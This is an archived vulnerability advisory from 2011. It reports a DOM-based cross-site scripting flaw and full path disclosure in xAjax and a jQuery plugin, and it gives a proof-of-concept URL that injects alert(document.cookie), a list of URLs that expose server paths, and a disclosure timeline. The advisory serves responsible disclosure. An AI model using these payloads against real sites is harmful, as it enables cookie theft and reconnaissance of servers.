xAjax Cross Site Scripting / Path Disclosure

xAjax Cross Site Scripting / Path Disclosure: Posted Jan 20, 2011; Authored by MustLive; xAjax suffers from cross site scripting and path disclosure vulnerabilities.; tags | exploit, vulnerability, xss, info disclosure; SHA-256 | 7a508876058333955dd88d1c78ac440125c6293507ea7a7edc0b98a5c780b0e6; Download | Favorite | View

xAjax Cross Site Scripting / Path Disclosure

Hello list!

I want to warn you about Cross-Site Scripting and Full path disclosure
vulnerabilities in xAjax and xajax_jquery_plugin.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of xAjax. Vulnerable are all
versions of xajax_jquery_plugin.

----------
Details:
----------

XSS (WASC-08):

http://site/cms/’;alert(document.cookie);/*

It is DOM Based XSS. This vulnerability particularly exists in MC Content
Manager (which uses xAjax and XSS code executes in xAjax's JS code).

Full path disclosure (WASC-13):

http://site/xajax_core/legacy.inc.php
http://site/xajax_core/xajax_lang_de.inc.php
http://site/xajax_core/xajax_lang_nl.inc.php
http://site/xajax_core/plugin_layer/xajaxCallableObjectPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxDefaultIncludePlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxEventPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxFunctionPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxScriptPlugin.inc.php
http://site/xajax_core/plugin_layer/xajaxDefaultRequestProcessorPlugin.inc.php
http://site/jquery.php
http://site/demo.php

The files jquery.php and demo.php belong to xajax_jquery_plugin. These
vulnerabilities exist at different sites and in different web applications,
which are using xAjax and xajax_jquery_plugin.

------------
Timeline:
------------

2010.11.06 - announced at my site.
2010.11.07 - informed developers of xAjax.
2010.11.07 - informed developers of xajax_jquery_plugin.
2011.01.19 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4661/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 65 files
LiquidWorm 24 files
Debian 18 files
indoushka 15 files
Apple 9 files
Google Security Research 7 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,155)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,819)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,239)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,968)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

xAjax Cross Site Scripting / Path Disclosure

xAjax Cross Site Scripting / Path Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

xAjax Cross Site Scripting / Path Disclosure

Share This

xAjax Cross Site Scripting / Path Disclosure

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems